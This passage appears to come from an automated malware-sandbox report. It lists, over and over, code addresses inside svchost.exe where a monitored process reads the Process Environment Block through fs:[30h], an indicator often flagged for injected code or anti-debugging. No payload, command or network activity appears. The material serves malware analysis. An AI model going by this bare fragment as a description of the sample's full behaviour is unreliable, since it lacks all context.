Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]	2_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]	2_2_03C6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]	2_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]	2_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]	2_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]	2_2_03CAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03C6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03CAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03CB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]	2_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]	2_2_03C34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03C6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]	2_2_03C666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]	2_2_03C4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]	2_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]	2_2_03CF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]	2_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]	2_2_03C6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]	2_2_03C62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]	2_2_03CAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]	2_2_03C4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]	2_2_03C72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]	2_2_03C4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]	2_2_03C66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]	2_2_03C68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]	2_2_03C3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03C6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]	2_2_03C365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03C6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]	2_2_03C325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]	2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]	2_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]	2_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]	2_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]	2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]	2_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]	2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]	2_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]	2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]	2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]	2_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]	2_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]	2_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]	2_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]	2_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]	2_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]	2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]	2_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]	2_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]	2_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]	2_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]	2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]	2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]	2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]	2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]	2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]	2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]	2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]	2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]	2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]	2_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]	2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]	2_2_03C6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]	2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]	2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]	2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]	2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]	2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]	2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]	2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]	2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]	2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]	2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]	2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]	2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h]	2_2_03C28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]	2_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h]	2_2_03D04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]	2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]	2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]	2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]	2_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]	2_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]	2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]	2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]	2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]	2_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]	2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]	2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]	2_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]	2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]	2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A9D0
